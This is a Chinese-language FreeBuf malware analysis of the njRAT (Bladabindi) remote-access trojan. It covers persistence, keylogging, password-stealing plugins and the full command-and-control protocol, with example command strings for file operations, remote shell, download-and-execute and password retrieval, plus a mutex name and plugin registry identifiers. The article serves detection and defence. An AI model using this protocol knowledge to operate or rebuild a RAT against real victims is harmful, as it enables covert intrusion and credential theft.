史上最全的njRAT通信协议分析

*本文原创作者:菠菜,本文属FreeBuf原创奖励计划,未经许可禁止转载

Njrat,又称Bladabindi,该木马家族使用.NET框架编写,是一个典型的RAT类程序,通过控制端可以操作受控端的文件、进程、服务、注册表内容,也可以盗取受控端的浏览器的保存的密码信息等内容。此外,还具有远程屏幕抓取,木马客户端升级等功能。

Njrat采用了插件机制,通过使用不同的插件来扩展新的木马功能。

本文涉及到njrat的三款插件,分别为:sc2.dll,ch.dll和pw.dll,其中的ch.dll用来实现与受控端的聊天对话功能。pw.dll用来实现对受控端密码内容的抓取,sc2.dll用来实现远程桌面功能。

当受控端上线时,主控端会弹出提示信息如下所示:

控制端:

木马配置选项如下:

控制界面如下图

木马程序

总体的代码结构:

对于被控端代码(也就是木马程序)的总体代码结构如下图:

木马的Main函数入口只是调用了Ok类的ko方法。

确保单实例运行

通过互斥体来实现单实例运行。互斥体名称为“f8782a013a20610e09216f21b705d856”。

拷贝自身,设置注册表,加启动项:

1.判断是不是在temp目录下 2.如果不在temp目录下,判断temp目录下是否有样本文件存在 3.如果样本文件存在,刚将样本文件删除 4.重新拷贝自己到临时目录下 5.运行temp目录下的程序

设置注册表:

添加防火墙规则:

添加启动项,与主控端设置相关:

添加的注册表中启动项位置

添加的启动项的名称

键盘记录功能:

开启线程键盘记录

键盘记录线程函数:

键盘记录到的内容:

通信过程

通信中的关键数据使用base64加密的数据。通信命令各部分之间使用|’|'|分隔。

开启线程,与主控端通信

通信过程的内容主要分为四部分:

第一部分:命令类型如Ex,un,div,rn,ret等 第二部分为:命令的子类型,如proc,tcp,RG,rs,srv 第三部分为:操作命令,如~表示查看,k表示杀掉 第四部分为:操作命令对应的参数。如要杀死的进程名,要启动的服务名,要关闭的网络连接等

以下对于常用功能的通信命令进行详细分析。

文件管理命令

Ex|'|'|fm|'|'|~命令类型为Ex,命令子类型为fm操作命令类型如下:!对应打开文件内容,dl删除文件rar表示压缩文件nm表示重命名文件up表示上传文件fl表示Ex|'|'|fm|'|'|!|'|'|QzpcVXNlcnNcQWRtaW5pc3RyYXRvclxEZXNrdG9wXA==表示打开“C:\Users\Administrator\Desktop\”目录Ex|'|'|fm|'|'|dl|'|'|RTpcZHVtcCAtIOWJr+acrC5leGUq表示删除“E:\dump - 副本.exe“文件Ex|'|'|fm|'|'|rar|'|'|RTpcLnJhcg==|'|'|RTpc|'|'|YSAteSAiRTpcLnJhciIgImR1bXAgLSDlia/mnKwubWFwIg==将“a -y "E:\.rar" "dump - 副本.map"”压缩到“E:\.rar”(RTpcLnJhcg==解base64)Ex|'|'|fm|'|'|nm|'|'|RTpcaHJzd29yZC5leGUqSEFIQSo=将E:\hrsword.exe命名为HAHAEx|'|'|fm|'|'|up|'|'|10.0.2.15:49200|'|'|RTpcZXhhbXBsZS5iYXQ=|'|'|8将“E:\example.bat”文件上传到10.0.2.15:49200地址,文件的大小为8字节Ex|'|'|fm|'|'|fl|'|'|d3d3LmJhaWR1LmNvbS9hLmpwZw==|'|'|RTpcd3d3LmJhaWR1LmNvbS9hLmpwZw==将www.baidu.com/a.jpg下载到

网络连接查看命令

命令格式为:

Ex|'|'|tcp|'|'|操作命令|'|'|操作参数操作命令中:!表示断开连接,~表示显示连接列表Ex|'|'|tcp|'|'|~|'|'| 表示显示所有的网络连接列表Ex|'|'|tcp|'|'|!|'|'|0.0.0.0:491540.0.0.0:0表示断开这条连接

注册表查看命令

命令格式为:

Ex|'|'|RG|'|'|操作命令|'|'|操作参数操作命令包括:~表示查看命令,!表示新建命令,@表示删除注册表内容命令Ex|'|'|RG|'|'|!|'|'|HKEY_CURRENT_USER\|'|'|aaaa|'|'|bbb|'|'|1表示在HKEY_CURRENT_USER\注册表下新建名字为aaaa,内容为bbb,类型为1的注册表项

Ex|'|'|RG|'|'|@|'|'|HKEY_CURRENT_USER\|'|'|aaaa删除aaaa的键值Ex|'|'|RG|'|'|~|'|'|HKEY_CURRENT_USER\ 查看注册表HKEY_CURRENT_USER下的内容

远程shell命令

命令格式为:Ex|'|'|rs|'|'|操作命令|'|'|操作参数操作命令包括:~表示打开远程shell命令,!表示远程执行命令Ex|'|'|rs|'|'|~ 表示显示远程shell窗口Ex|'|'|rs|'|'|!|'|'|dGFza2xpc3Q= 远程运行tasklist命令

服务查看命令

命令格式为:Ex|'|'| srv |'|'|操作命令|'|'|操作参数操作命令包括:~对应显示列表命令,@对应的暂停命令,!对应的停止命令,#对应开启服务命令Ex|'|'|srv|'|'|~ 显示所有的服务列表Ex|'|'|srv|'|'|!|'|'|AeLookupSvc 停止AeLookupSvc服务的命令

进程命令

命令格式为:Ex|'|'| proc |'|'|操作命令|'|'|操作参数操作命令包括:~对应显示列表命令,k杀死指定进程Ex|'|'|proc|'|'|~ 显示进程列表Ex|'|'|proc|'|'|k|'|'|3036 杀死pid为3036的进程的通信命令

对木马文件的操作命令

命令格式为:un |’|'| proc|’|'|操作命令

操作命令包括:

!结束木马端的运行,@重新启动木马客户端, ~卸载木马程序

卸载木马程序主要进行下面的操作

升级木马客户端

使用up 命令有两种升级方式:本地磁盘文件升级和在线升级使用在线升级的数据包内容为:up|'|'|木马升级包地址本地升级数据包内容为:up|'|'|\u001F+本地升级包的zip压缩后的内容

下载执行

被控端接收到下载执行的命令,解析出命令参数,使用WebClient的DownloadData方法下载,下载成功后执行

脚本执行与本地执行:

主控端的脚本的内容会使用ZIP压缩后,再封装成命令包发送,控制端接收到命令后,会使用压缩算法解压后,将内容写入到临时目录下的指定的扩展名(扩展名也由主控端发送确定)后,执行。

与下载执行的数据包内容不同之处在于,脚本执行与本地执行数据包的头两个字节为001f

获取密码:

主控端向受控端发送ret指令,受控端接收到指令后,加载注册表中保存的pw插件,使用插件获取到密码后发送给主控端

主控端发送的命令为:

ret|'|'|b88ece4c04f706c9717bbe6fbda49ed2|'|'|(其中的b88ece4c04f706c9717bbe6fbda49ed2表示pw插件保存在注册表中的位置受控端返回的密码信息格式为:ret|'|'|b88ece4c04f706c9717bbe6fbda49ed2|'|'|KiAqICogKiAqICogKiAqICogKiAqICogKiA=KiAqICogKiAqICogKiAqICogKiAqICogKiA=解base64后为“* * * * * * * * * * ** *”,表示没有获得密码内容

聊天通信的实现:

从注册表中得到ch的组件,大小为 0×3000。

屏幕图像的通信:

这里的通信并不是“远程桌面”的效果,而是下图中的缩略图的通信内容

通过CopyFromScreen得到屏幕截图保存到图片格式,随后将此次生成的图像与上次生成的图像进行md5比较,如果md5不一致,则发送这次的截图数据。通过md5来对比图像是为了减少重复传输多次相同内容的图像。

通信的数据包内容为:

CAP|'|'|35|'|'|23

表示向受控端请求的图像是用来显示在主控端的缩略图中

远程桌面的通信:

远程桌面的效果图:

通信的数据包命令为:div

木马端会根据控制端传送的数据包,判断注册表下是不是有对应的插件,如果没有,发送反馈包给控制端,随后控制端会发送一个经过压缩的sc2.dll的插件给受控端,受控端随后启用插件进行远程桌面的通信。并将插件写入到注册表中。

结论

Njrat 是近年来最为活跃的木马家族之一。这一方面是因为木马简单易学,在网上随处可见配置木马的文章,另一方面,其强大的远控功能满足了网络犯罪的需要,甚至网络江湖中有传闻,极端组织ISIS也曾使用njRAT作为重要的网络武器。

本文只是对njRat使用的各种远控功能的数据通话进行了梳理与罗列,只做技术学习交流。安全厂商可根据自身需要在其网络安全设备中加入相应的检测与防护策略,共同抵抗njrat的入侵。

*本文原创作者:菠菜,本文属FreeBuf原创奖励计划,未经许可禁止转载

原文发布于微信公众号 - FreeBuf(freebuf)

原文发表时间:2016-12-13

本文参与腾讯云自媒体分享计划,欢迎正在阅读的你也加入,一起分享。

发表于

我来说两句

0 条评论
登录 后参与评论

相关文章

来自专栏FreeBuf

Metasploitable2使用指南

Metasploitable 2 Metasploitable2 虚拟系统是一个特别制作的ubuntu操作系统,本身设计作为安全工具测试和演示常见漏洞攻击。版...

5299
来自专栏挖掘大数据

Apache NiFi 简介及Processor实战应用

Apache NiFi是什么?NiFi官网给出如下解释:“一个易用、强大、可靠的数据处理与分发系统”。通俗的来说,即Apache NiFi 是一个易于使用、功能...

1.8K10
来自专栏c#开发者

企业库推广

企业库推广  阿新 1. 概述 可重用的程序块库,用于解决共性的企业级开发过程中所面临的挑战 l 较低风险(经过实践验证的、精准的) l 降低成本(可充用) ...

36313
来自专栏吴生的专栏

SpringBoot整合RabbitMQ之典型应用场景实战一

实战前言 RabbitMQ 作为目前应用相当广泛的消息中间件,在企业级应用、微服务应用中充当着重要的角色。特别是在一些典型的应用场景以及业务模块中具有重要的作用...

1080
来自专栏张善友的专栏

使用Hystrix提高系统可用性

今天稍微复杂点的互联网应用,服务端基本都是分布式的,大量的服务支撑起整个系统,服务之间也难免有大量的依赖关系,依赖都是通过网络连接起来。 ? (图片来源:htt...

2135
来自专栏区块链

20种功能强大的跨平台渗透测试工具

什么是渗透测试?用来测试软件是否存在例如安全方面的漏洞,如果已经存在,会不会被入侵。 渗透测试流程: 1、列出软件或系统潜在的安全漏洞。 2、根据漏洞的严重性进...

2447
来自专栏Urahara Blog

域渗透-信息收集基础

6475
来自专栏FreeBuf

小心Windows旧版认证暴露你的系统帐户密码

当你正用浏览器访问网站时,Windows的一个古老漏洞就可能泄露了你电脑的用户名密码、微软登录信息,甚至还有你VPN的账号密码。 多年以前当Windows还在使...

23910
来自专栏北京马哥教育

JMeter使用技巧

在这此对新版本jmeter的学习+温习的过程,发现了一些以前不知道的功能,所以,整理出来与大分享。本文内容如下。 如何使用英文界面的jmeter 如何使用镜像...

5149
来自专栏张善友的专栏

WCF服务在高负载下可能会变慢

KB2538826 解释了WCF服务在突发的请求下会发生的问题:当您的 WCF 服务接收请求的突发时,默认.Net I/O 完成端口 (IOCP) 线程池可能不...

2165

扫码关注云+社区

领取腾讯云代金券